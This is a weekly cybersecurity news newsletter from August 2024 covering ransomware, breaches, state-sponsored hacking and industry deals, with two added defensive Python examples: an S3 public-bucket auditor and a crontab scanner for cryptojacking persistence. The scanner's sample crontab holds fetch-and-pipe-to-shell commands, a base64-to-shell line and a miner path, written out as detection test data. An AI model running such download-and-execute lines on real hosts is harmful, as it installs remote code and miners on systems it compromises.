Iranian hackers are teaming up with ransomware gangs, was the US Marshals Service breached, and the Telegram CEO arrest sparked DDoS attacks.
Infosec Monitor: No. 41
No. 41, August 30, 2024
Welcome back to another edition of the Infosec Monitor, a weekly newsletter covering what's happened, what's happening, and what's coming in cybersecurity.
In this week's edition of the Infosec Monitor — Iranian hackers are teaming up with ransomware gangs, was the US Marshals Service breached, and the Telegram CEO arrest sparked DDoS attacks.
Highlight of the Week
Iranian hacking groups target US, UAE sectors, partner with ransomware gangs
Iranian hacking groups Pioneer Kitten and Peach Sandstorm are targeting critical sectors in the U.S. and UAE, collaborating with ransomware gangs, and deploying custom malware. Their activities, linked to the IRGC, focus on exploiting vulnerabilities in major tech infrastructures. Bleeping Computer Cyberscoop
Get The Infosec Monitor every Friday in your inbox
Subscribe 👉 https://infosecmonitor.beehiiv.com
News
Arrest of Telegram CEO sparks hacktivist cyberattacks on French websites
Telegram CEO Pavel Durov's arrest in France led hacktivists to launch DDoS attacks against key French websites. Authorities cite Telegram's lack of crime moderation. Major hackers like the Russian Cyber Army Team, UserSec, and RipperSec participated. Impacted sites include government, media, health, agriculture, energy, and financial sectors. SC Magazine
US Marshals Service disputes breach claims by Hunters International ransomware gang
US Marshals Service denies Hunters International's breach claims after being listed on their leak site. The posted data matches files sold in March 2023. Hunters International, potentially a rebranded Hive, has targeted several high-profile organizations, making 157 attacks in 2023. Bleeping Computer
CrowdStrike has estimated its July incident has cost them $60M. SecurityWeek
American Radio Relay League paid $1 million ransom after ransomware attack
The ransom was mainly covered by insurance. Bleeping Computer
AI & Security
OpenAI and Anthropic partner with US AI Safety Institute for responsible AI development
OpenAI and Anthropic will share their AI models with the U.S. AI Safety Institute to ensure safety and innovation. The institute, part of NIST, will have early and ongoing access to these models, promoting responsible AI development and transparency. siliconANGLE
AI safety becomes a divisive issue as industry debates guardrails, public use. Axios
Cybersecurity Incidents
Cyberattack disrupts Seattle airport
A cyberattack disrupted Seattle-Tacoma International Airport during a peak travel period, causing significant delays and limited operations. Alaska Airlines advised avoiding checked bags, and airport websites remain down. This attack follows recent disruptions to U.S. critical infrastructure. The incident is under investigation, with recovery time unclear. Axios
Park'N Fly data breach exposes 1 million customers' information
Park'N Fly's data breach exposed personal information of 1 million Canadian customers via stolen VPN credentials between July 11-13, 2024. No financial data was compromised. The company fully restored systems within five days and advised customers to reset Aeroplan passwords and stay vigilant for phishing. Bleeping Computer
APT32's multi-year cyberattack targets Vietnamese human rights group
A Vietnamese human rights non-profit faced a multi-year cyberattack by APT32 (aka OceanLotus), deploying various malware through methods like spear-phishing. The campaign, ongoing for at least four years, aimed to steal sensitive information and intellectual property. The Hacker News
Texas Dow Employees Credit Union data breach impacts 500,000
The Texas Dow Employees Credit Union notified 500,000 individuals of a data breach linked to the 2023 MOVEit attacks by the Clop ransomware gang. Discovered on July 30, the breach affected personal data including Social Security numbers and financial details. Experts stress improved cybersecurity practices and vigilance against ongoing threats. SC Magazine
Almost a million affected by Young Consulting data breach, BlackSuit claims responsibility
Young Consulting (Connexure) notified 954,177 individuals of an April 10, 2024, data breach claimed by BlackSuit ransomware. Compromised data includes personal and insurance information. Management refused to negotiate, leading to public release of the data. Affected individuals get free credit monitoring. FBI links BlackSuit to Royal ransomware, targeting various sectors. Cybernews
Durex India exposed customer data due to site vulnerability
Durex India exposed customers' personal data due to improper authentication on its order confirmation page. Hundreds were likely affected. The data includes names, phone numbers, and product details. TechCrunch verified the issue, and Durex's parent company, Reckitt, declined to comment. TechCrunch
Dick’s Sporting Goods reports cyberattack exposing confidential data
Dick’s Sporting Goods disclosed a cyberattack on August 21, 2024, potentially exposing confidential information. They shut down email and locked employee accounts, manually verifying identities. Despite the breach, business operations remain unaffected. Investigation continues, with federal law enforcement notified. Bleeping Computer
Ireland’s Fota Wildlife Park hit by cyberattack
Fota Wildlife Park in Cork, Ireland, faced a cyberattack affecting ticket buyers from May to August. Customers are urged to cancel their bank cards due to potential financial data breaches. The park is investigating with cybersecurity experts and has secured its website, though the facility remains open. The Record
ServiceBridge data breach exposes 31.5 million sensitive documents since 2012
A security researcher found 31.5 million sensitive documents exposed from ServiceBridge, affecting multiple industries since 2012. Data included contracts, invoices, personal info, and HIPAA forms, raising significant privacy and security concerns. The database was removed after disclosure, but the exposure duration and access by unauthorized parties remain unclear. Cybernews
Illinois county leaked voter data for months
St. Clair County, Illinois leaked nearly 470,000 sensitive voter documents via a misconfigured Amazon S3 bucket. The data, accessible for months, includes names, addresses, Social Security numbers, and more, posing risks like identity theft and voter fraud. The leak was secured post-discovery in March 2024. Cybernews
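The St. Clair County leak is the familiar public-bucket failure mode. As an added illustration (not code from the newsletter or from any of the parties it reports on), the following Python audits an S3 bucket policy document for statements that grant access to an anonymous principal, and checks whether the account-level Public Access Block settings are all enforced. The bucket name, account id and policy below are constructed sample values; in a real audit the two inputs would come from the `get_bucket_policy` and `get_public_access_block` calls of the AWS SDK.

```python
from __future__ import annotations

import json

# Constructed sample bucket policy (not any real organisation's configuration).
# It mixes one properly scoped statement (CloudFront origin, with a SourceArn condition)
# with one wildcard-principal grant of the kind that exposes a bucket to the internet.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AllowCloudFrontRead",
            "Effect": "Allow",
            "Principal": {"Service": "cloudfront.amazonaws.com"},
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::records-example-bucket/*",
            "Condition": {"StringEquals": {
                "AWS:SourceArn": "arn:aws:cloudfront::123456789012:distribution/EXAMPLEID"}},
        },
        {
            "Sid": "PublicRead",
            "Effect": "Allow",
            "Principal": "*",
            "Action": ["s3:GetObject", "s3:ListBucket"],
            "Resource": ["arn:aws:s3:::records-example-bucket",
                         "arn:aws:s3:::records-example-bucket/*"],
        },
    ],
})

# The four real keys of an S3 PublicAccessBlockConfiguration; all must be True.
PAB_KEYS = ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")


def _as_list(value) -> list:
    """IAM policy fields may be a scalar or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _is_anonymous(principal) -> bool:
    """True for Principal "*" or {"AWS": "*"} (either form means 'everyone')."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def find_public_statements(policy_json: str) -> list[dict]:
    """Return every Allow statement whose principal is anonymous.

    Each finding records the Sid, the actions granted and whether the grant is
    unconditional (no Condition block at all, the worst case)."""
    policy = json.loads(policy_json)
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if not _is_anonymous(stmt.get("Principal")):
            continue
        findings.append({
            "sid": stmt.get("Sid", "<no Sid>"),
            "actions": _as_list(stmt.get("Action", [])),
            "resources": _as_list(stmt.get("Resource", [])),
            "unconditional": "Condition" not in stmt,
        })
    return findings


def public_access_block_enforced(config: dict) -> bool:
    """True only when every Public Access Block flag is set; a missing key counts as off."""
    return all(config.get(k) is True for k in PAB_KEYS)


if __name__ == "__main__":
    for f in find_public_statements(SAMPLE_POLICY):
        flag = "UNCONDITIONAL" if f["unconditional"] else "conditional"
        print(f"[{flag}] statement {f['sid']} grants {f['actions']} to everyone")
    # Constructed account setting: one flag left off, so the block is not enforced.
    sample_pab = {"BlockPublicAcls": True, "IgnorePublicAcls": True,
                  "BlockPublicPolicy": False, "RestrictPublicBuckets": True}
    print("public access block enforced:", public_access_block_enforced(sample_pab))
```

The check deliberately treats a statement with any Condition block as a lower-severity finding rather than silently accepting it, because conditions such as a source VPC or IP range still need a human to confirm they actually restrict the audience.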
Patelco Credit Union ransomware attack exposes 726,000 customers’ data
Patelco Credit Union disclosed that a RansomHub ransomware attack led to a data breach impacting 726,000 customers. Exposed data includes SSNs and driver’s license numbers. On August 15, 2024, attackers published the data. Patelco provides affected users with two-year identity protection. Increased phishing risks are noted. Bleeping Computer
Threat Intel
Cryptojacking attacks continue exploiting critical Atlassian Confluence vulnerability
Trend Micro reports ongoing cryptojacking attacks exploiting CVE-2023-22527, a critical flaw in Atlassian Confluence first discovered in January. Threat actors use shell scripts, XMRig miners, and target SSH endpoints, maintaining persistence via cron jobs. Administrators are urged to patch systems, segment networks, and conduct regular security audits. Dark Reading
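The Confluence cryptojacking campaign described above persists through cron entries that fetch and run a shell script. As an added example (not code from the newsletter or from Trend Micro), the following Python scans crontab text for the traits such entries tend to share: a download piped straight into a shell, a base64 decode piped into a shell, an every-minute schedule, output discarded to `/dev/null`, and miner-related keywords. The crontab lines and IP addresses in it are constructed sample data, not indicators from the report.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample crontab (not from the article): a comment, two benign entries, and
# four entries shaped like the persistence a cryptojacking dropper leaves behind.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * /usr/local/bin/backup.sh >/var/log/backup.log 2>&1
*/5 * * * * curl -fsSL http://198.51.100.23/x.sh | sh
@reboot (wget -q -O- http://203.0.113.9/m.sh || curl http://203.0.113.9/m.sh) | bash >/dev/null 2>&1
* * * * * echo "base64-payload" | base64 -d | sh
0 * * * * /tmp/.x/xmrig >/dev/null 2>&1
"""

# Heuristic indicators as (name, regex) pairs. Each is a weak signal on its own; the
# value of the scan is in surfacing lines that match one or more of them for review.
INDICATORS: list[tuple[str, re.Pattern]] = [
    # curl/wget whose output is piped into sh or bash
    ("download_pipe_shell", re.compile(r"\b(curl|wget)\b[^|;\n]*\|\s*(ba)?sh\b")),
    # base64 -d / --decode piped into a shell
    ("base64_decode_exec", re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(ba)?sh\b")),
    # schedule of five bare asterisks: runs every minute (typical of a re-spawn loop)
    ("high_frequency", re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s")),
    # all output thrown away, which hides errors from log review
    ("discard_output", re.compile(r">\s*/dev/null\s+2>&1")),
    # names and protocols associated with Monero mining
    ("miner_keyword", re.compile(r"xmrig|minerd|stratum\+tcp", re.I)),
]


@dataclass
class Finding:
    line_no: int
    line: str
    reasons: list[str] = field(default_factory=list)


def scan_crontab(text: str) -> list[Finding]:
    """Return one Finding per non-comment crontab line that matches any indicator.

    Line numbers are 1-based over the input so they can be quoted back to the
    administrator; comment and blank lines are skipped but still counted."""
    findings: list[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = [name for name, rx in INDICATORS if rx.search(line)]
        if reasons:
            findings.append(Finding(line_no, line, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {', '.join(f.reasons)}\n    {f.line}")
```

On a live host the same function can be pointed at the output of `crontab -l` for each user and at the files under `/etc/cron.d`; a line that matches two or more indicators is a strong candidate for immediate investigation, while a single `discard_output` match on a known maintenance script is usually noise.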
Spear-phishers target manufacturing sector for Microsoft credentials
Spear-phishers in the US and Canada are targeting the manufacturing sector by impersonating known companies to steal Microsoft credentials. Emails lure victims to a fake Microsoft login, harvesting their passwords. Experts advise monitoring spoofed domains and educating employees to counter the threat. Dark Reading
Chinese hackers exploit critical software flaw targeting ISPs
Chinese state-sponsored hackers, Volt Typhoon, exploit a zero-day flaw in Versa Director software used by ISPs. They leverage elevated admin privileges to upload malicious files and evade detection. At least five companies, including four in the US, are compromised. CISA advises urgent patching by September 13. Cybernews
Russian group APT29 targets Mongolian government websites with NSO group exploits
Google linked a cyber-espionage campaign against Mongolian government sites to Russia's APT29, using exploits previously deployed by Intellexa and NSO Group. The operation aimed to steal cookies and credentials from iPhone, Android, and Chrome users. The Record
BlackByte ransomware gang only posting 20% to 30% of successful attacks. The Record
One million WordPress sites have flaw that enables remote code execution. The Hacker News
Interesting Reads
OWASP: A crucial resource for web application security and AI standards
OWASP is a nonprofit offering resources to enhance web app security. Amid increasing data breaches, OWASP provides impartial guidance to address vulnerabilities. The OWASP Top 10 lists critical risks, aiding developers and security experts. OWASP also advances AI security through the OWASP AI Exchange. CSO Online
Data & Research
Vulnerabilities
17,518 new vulnerabilities were discovered in the first half of 2024, up 11% from 2023; over 45% of these were rated high to critical. siliconANGLE
Cybersecurity Mergers, Acquisitions, and Funding
Mergers & Acquisitions
Robust Intelligence, AI security, acquired by Cisco for an undisclosed sum. siliconANGLE
Cyberint, cyber risk management, to be acquired by Check Point for undisclosed sum. SecurityWeek
Bird Eat Bugs, bug reporting, acquired by BrowserStack for an undisclosed sum. siliconANGLE
VC Funding
Cribl, IT and data security, raises $319M in Series E funding. SecurityWeek
Uniquekey, business password management, raises $5.9M in venture funding (series unknown). SecurityWeek